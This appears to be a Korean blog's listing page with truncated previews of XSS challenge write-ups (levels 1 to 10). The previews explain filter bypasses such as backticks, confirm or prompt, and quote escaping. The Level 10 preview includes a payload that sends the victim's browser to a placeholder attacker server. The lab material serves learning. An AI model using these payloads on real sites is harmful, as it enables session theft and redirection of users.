XSS Challenges 10

level 10๋‹จ๊ณ„๋ฅผ ์ง„ํ–‰ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ํ‘œ๋ฉด์ƒ ๋ณด์ด๋Š” ํ™”๋ฉด์€ ์ด์ „๊ณผ ์œ ์‚ฌํ•œ ๋ชจ์Šต์„ ๋„์šฐ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋‚ด๋ถ€ ์ฝ”๋“œ๋ฅผ ๋จผ์ € ์‚ดํŽด๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. 10๋‹จ๊ณ„์—์„œ๋Š” a์™€ b๋ผ๋Š” ๋ณ€์ˆ˜์™€ ๊ฐ’์ด ์„ ์–ธ๋˜์–ด ์žˆ๋Š” ์ƒํƒœ์ž…๋‹ˆ๋‹ค. ์šฐ๋ฆฌ๊ฐ€ ์ž…๋ ฅํ•  Payload๋Š” "a" ๋ณ€์ˆ˜์— ๋‹ด๊ธฐ๋„๋ก ๋˜์–ด์žˆ๋Š”๋ฐ document.write ์†์„ฑ์„ ํ†ตํ•ด ๊ฐ’์ด ์‹คํ–‰๋˜๋Š” ๊ฒƒ์„ ๋ณด์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. document.write()์˜ ๊ธฐ๋Šฅ์€ Document Object์˜ ํ•จ์ˆ˜๋กœ ์ธ์ˆ˜ ๊ฐ’์„ ์›น ๋ธŒ๋Ÿฌ์šฐ์ € ํ™”๋ฉด์— ํ…์ŠคํŠธ ํ˜•์‹์œผ๋กœ ์ถœ๋ ฅํ•ด์ฃผ๋Š” ๊ธฐ๋Šฅ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ';{document.location.href="http://IP"}// 9๋‹จ๊ณ„์—์„œ ์ง„ํ–‰ํ•œ ๋ฐฉ๋ฒ•๋Œ€๋กœ a๋ณ€์ˆ˜๋ฅผ ๋‹ซ์•„ ๋งˆ๋ฌด๋ฆฌ(;)ํ•ด์ฃผ๊ณ  ๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋ฅผ ๋กœ๋“œ์‹œ์ผœ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋˜๋„๋ก ํ•ด์ฃผ๋ฉด ๋  ๊ฒƒ ๊ฐ™์Šต๋‹ˆ๋‹ค. ๋’ค..

CHALLENGE
XSS Challenges 9

ํ•œ๋™์•ˆ ์˜ฌ๋ฆฌ์ง€ ๋ชปํ–ˆ๋˜ XSS ์ฑŒ๋ฆฐ์ง€๋ฅผ ์˜ค๋žœ๋งŒ์— ๋‹ค์‹œ ํ’€๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ œ๊ฐ€ ์žฌ๋ฏธ์žˆ๊ฒŒ ํ’€๊ณ  ์žˆ๋Š” Alexander Korznikov์˜ XSS ์ฑŒ๋ฆฐ์ง€์˜ ์žฅ์ ์€ ๊ธฐ์กด์˜ XSS ๊ฒŒ์ž„๊ณผ๋Š” ๋‹ค๋ฅด๊ฒŒ ํŒŒํšŒ ๋ฒ•์„ ์˜ฌ๋ฆฐ ์‚ฌ๋žŒ๋“ค์ด ๋งŽ์ด ์—†์œผ๋ฉฐ(๊ตญ๋‚ด์—์„œ๋Š” ๋ณธ ์ ์ด ์—†๋„ค์š”..) ์ถœ์ œ์ž์˜ ์˜๋„๋ฅผ ์•Œ์•„์„œ ํŒŒ์•…ํ•˜๊ณ  ์ผ๋ง์˜ ํžŒํŠธ ์—†์ด ๊ณต๋žต ํ•œ๋‹ค๋Š” ์ ์—์„œ ๋”์šฑ ์• ์ฐฉ์ด ๊ฐ€๊ณ  ๋ชฐ์ž…์ด ๋˜๋Š” ๊ฑฐ ๊ฐ™์Šต๋‹ˆ๋‹ค. ๊ณต๋žต ํŽ˜์ด์ง€๋Š” ๊ต‰์žฅํžˆ ์‹ฌํ”Œํ•ฉ๋‹ˆ๋‹ค. Reflected ๋ฐฉ์‹์œผ๋กœ ํŒŒ๋ผ๋ฏธํ„ฐ์— ์ ์ ˆํ•œ Payload๊ฐ€ ์‚ฝ์ž…๋  ๊ฒฝ์šฐ ๋‹ค์ด์–ผ๋กœ๊ทธ ํŒ์—…์ฐฝ์„ ๋„์šฐ์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด์ „ ๋‹จ๊ณ„(8-1) ์˜ ์†Œ์Šค์™€ ์œ ์‚ฌํ•œ ํ˜•ํƒœ์˜ ์ฝ”๋“œ๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. b๋ผ๋Š” ๋ณ€์ˆ˜์—๋Š” "1"์ด ์„ ์–ธ๋˜์–ด ์žˆ๊ณ  if ์กฐ๊ฑด๋ฌธ์„ ํ†ตํ•ด ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋  ์ˆ˜ ์žˆ๋„๋ก ๊ตฌ๋ฌธ์„ ์™„์„ฑ์‹œ์ผœ์•ผ ๋ฉ๋‹ˆ๋‹ค. b์˜ ๋ณ€์ˆ˜..

CHALLENGE
XSS Challenges 8-1

์กฐ๊ฑด๋ฌธ์ด ์‚ฌ์šฉ๋œ 8 Level์„ ์ด์–ด์„œ 8-1 Level๊นŒ์ง€ ํ•œ๋ฒˆ ํ’€์–ด๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ๋งํฌ ํƒœ๊ทธ๋‚˜ ์ž…๋ ฅ์„ ๋ฐ›๋Š” ํผ์ด ๋”ฐ๋กœ ์กด์žฌํ•˜์ง€ ์•Š์œผ๋ฉฐ URL ํŒŒ๋ผ๋ฏธํ„ฐ์— ์ ๋‹นํ•œ ๋ฌธ์ž์—ด์„ ์‚ฝ์ž…ํ•˜๋„๋ก ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ๋ณด์‹œ๋ฉด 8 Level ์†Œ์Šค์™€ ์œ ์‚ฌํ•ด ๋ณด์ด์ง€๋งŒ ์กฐ๊ธˆ ๋‹ค๋ฅธ ํ˜•ํƒœ๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์Šคํฌ๋ฆฝํŠธ์ฝ”๋“œ๋Š” ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ์‹คํ–‰๋˜์ง€ ์•Š๊ณ  ์žˆ์œผ๋ฉฐ ์ด์œ ๋Š” ๋ฐ”๋กœ "์ค„ ๋ฐ”๊ฟˆ"์— ์žˆ์Šต๋‹ˆ๋‹ค. ์ด 2๊ณณ์˜ ์ค„๋ฐ”๊ฟˆ ์ฒ˜๋ฆฌ๊ฐ€ ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. if ( b == 2 ){a = "Your_Payload"} ๋นจ๊ฐ„์ƒ‰์œผ๋กœ ์ฒ˜๋ฆฌ๋œ ๋ถ€๋ถ„์˜์ค„ ๋ฐ”๊ฟˆ์œผ๋กœ ์ธํ•ด ์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์ด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋งˆ์ง€๋ง‰ ๋ฌธ๋‹จ๋ผ์ธ์€ " } " ๋‹ซํž˜์— ์ž˜ ๋งž๊ฒŒ ๋ฌธ์ž์—ด ์กฐ์ ˆ์„ ํ•˜๋ฉด ๋˜๊ฒ ์ง€๋งŒ ์ฒซ ๋ฒˆ์งธ " { " ์ค„ ๋ฐ”๋€œ์œผ๋กœ ์ธํ•ด else ์กฐ๊ฑด๋ฌธ์ด ์ œ๋Œ€๋กœ..

CHALLENGE
XSS Challenges 5-2

์ „๋‹จ ๊ณ„์™€ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ URL์— ์ž…๋ ฅ๊ฐ’์„ ๋ฐ›์•„ ํŒ์—…์ฐฝ์„ ๋„์šฐ๋„๋ก ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์–ด๋–ค ๊ฒ€์ฆ์„ ํ•˜๋Š”์ง€ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•ด ์ „ ๋‹จ๊ณ„์—์„œ์˜ ์ฝ”๋“œ๋ฅผ ์‚ฝ์ž…ํ•˜์—ฌ ํŽ˜์ด์ง€์˜ ์†Œ์Šค๋ฅผ ํ™•์ธํ•ด ๋ณธ ๊ฒฐ๊ณผ ์ด๋ฒˆ์—๋Š” '(์‹ฑ๊ธ€ ์ฟผํ„ฐ)๋ฅผ --> \' ํ˜•ํƒœ๋กœ ๋ฐฑ ์Šฌ๋ž˜์‹œ๋ฅผ ์ถ”๊ฐ€๋กœ ๋ถ™์—ฌ์„œ ๊ฒ€์ฆํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ํ•ด๊ฒฐ ๋ฐฉ๋ฒ• 1. "(๋”๋ธ”์ฟผํ„ฐ) 2. \(๋ฐฑ์Šฌ๋ž˜์‹œ ํ™œ์šฉ) ์šฐ์„  ('guleum') --> (\'guleum\')๋กœ ์น˜ํ™˜๋˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— '(์‹ฑ๊ธ€์ฟผํ„ฐ) --> "(๋”๋ธ”์ฟผํ„ฐ)๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ์‚ฌ์šฉํ•ด์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋‹ค์Œ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ๋ณด์‹œ๋ฉด a ๋ณ€์ˆ˜์—๋Š” '(์‹ฑ๊ธ€ ์ฟผํ„ฐ)๊ฐ€ ๊ธฐ๋ณธ์ ์œผ๋กœ ํ•˜๋‚˜๊ฐ€ ๋ถ™์–ด์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๋‹ซ์„ ๋•Œ๋„ '(์‹ฑ๊ธ€ ์ฟผํ„ฐ)๋ฅผ ์‚ฌ์šฉํ•ด์„œ ๋ฌถ์–ด์ค˜์•ผ ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿด ๋•Œ๋Š” \(๋ฐฑ ์Šฌ๋ž˜์‹œ)๋ฅผ '\' ์‹ฑ๊ธ€ ์ฟผํ„ฐ๋กœ ๋ฌถ์–ด์ฃผ๋ฉด \(๋ฐฑ์Šฌ๋ž˜์‹œ)์— ์˜ํ•ด ..

CHALLENGE
XSS Challenges 4

์ „ ๋‹จ๊ณ„์—์„œ ์‚ฌ์šฉํ•œ ๊ณต๋ฐฑ ์น˜ํ™˜ ๊ตฌ๋ฌธ์„ ์‚ฝ์ž…ํ•ด๋ณธ ๊ฒฐ๊ณผ ์„ฑ๊ณต์ ์œผ๋กœ ์‹คํ–‰๋˜์ง€ ์•Š๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์–ด๋– ํ•œ ๊ตฌ๋ฌธ์„ ๊ฒ€์ฆํ•˜๊ณ  ์žˆ๋Š”์ง€ ์†Œ์Šค๋ฅผ ํ†ตํ•ด ํ™•์ธํ•ด ๋ณธ ๊ฒฐ๊ณผ "()(๊ด„ํ˜ธ)"์™€ ํŒ์—…์ฐฝ์„ ๋„์›Œ์ฃผ๋Š” "alert"๊ฐ€ ํ•„ํ„ฐ๋ง๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๊ด„ํ˜ธ์˜ ๊ฒฝ์šฐ ์ œ๊ฑฐ๋ฅผ ํ•˜๊ณ  ์žˆ์œผ๋ฉฐ alert๋Š” -> Alert๋กœ ๋ณ€๊ฒฝ์‹œํ‚ด์œผ๋กœ์จ ์˜๋ฏธ ์—†๋Š” ๊ตฌ๋ฌธ์„ ๋งŒ๋“ค๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๊ด„ํ˜ธ ์ œ๊ฑฐ์˜ ์ฝ”๋“œ๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์€ ` --> "back-tick" ๋ฐฑํ‹ฑ์„ ์‚ฌ์šฉํ•ด์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ alert๋ฅผ ํ˜ผ๋ˆ์‹œํ‚ค๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์ด๋ฒˆ ๋ฌธ์ œ์—๋Š” "confirm"์ด๋‚˜ "prompt"๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ์‚ฌ์šฉํ•ด์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์„ฑ๊ณตํ›„ ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ํ™•์ธํ•ด๋ณด์‹œ๋ฉด ๊ฒ€์ฆํ•˜๋Š” alert ๋Œ€์‹  confirm์œผ๋กœ ๋Œ€์ฒดํ•˜๊ณ  ๊ด„ํ˜ธ๋ฅผ ๋Œ€์‹ ํ•œ ๋ฐฑ ํ‹ฑ์œผ๋กœ ๊ตฌ๋ถ„์„ ํ•ด์คฌ๊ธฐ ๋•Œ๋ฌธ์— ํŒ์—…์ฐฝ ์„ฑ๊ณต์ ์œผ๋กœ ..

CHALLENGE
XSS Challenges 1

์„ค๋ช…(๋ฒˆ์—ญ) Level 0์„ ์ด์–ด์„œ ๋‹ค์Œ ๋‹จ๊ณ„์ธ Level 1์„ ํ•ด๊ฒฐํ•ด๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ์ „ ๋‹จ๊ณ„์—์„œ ์‚ฌ์šฉํ–ˆ๋˜ ๊ธฐ๋ณธ ๊ตฌ๋ฌธ์„ ์‚ฝ์ž…ํ•ด๋ณด๋ฉด javascript ๊ฐ€ ์‹คํ–‰๋˜์ง€ ์•Š๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ž…๋ ฅํ–ˆ๋˜ ์ฝ”๋“œ๊ฐ€ ์–ด๋–ป๊ฒŒ ์‚ฝ์ž…๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•ด๋ณด๋ฉด ์ฝ”๋“œ๊ฐ€ ์ œ๋Œ€๋กœ ๊ตฌ๋ถ„๋˜์–ด ์žˆ์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๋ณดํ†ต XSS ์ทจ์•ฝ์ ์„ ์ฐพ์„ ๋•Œ ์ž์ฃผ ์‚ฌ์šฉํ•˜๋Š” ๊ธฐ๋ฒ•์ธ "> ํด๋กœ์ง• ํƒœ๊ทธ๋ฅผ ์‚ฌ์šฉํ•ด์„œ ์ด์ „ ๊ตฌ๋ฌธ์„ ๋‹ซ์•„์ฃผ๊ณ  ์ง€๊ธˆ๋ถ€ํ„ฐ ์ž…๋ ฅ๋œ ๊ตฌ๋ฌธ์„ ์„ ์–ธํ•˜๊ฒ ๋‹ค๋Š” ๋ฐฉ์‹์„ ์ด์šฉํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ํŒ์—…์ฐฝ์ด ์„ฑ๊ณต์ ์œผ๋กœ ๋–ด์œผ๋ฉด ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ํ†ตํ•ด ๊ตฌ๋ฌธ์ด ์–ด๋–ป๊ฒŒ ๋˜์—ˆ๋Š”์ง€ ํ™•์ธํ•ด ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. alert("guleum");์œผ๋กœ ๋ช…ํ™•ํ•˜๊ฒŒ ๊ตฌ๋ถ„์ด ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. Exploit Code ">

CHALLENGE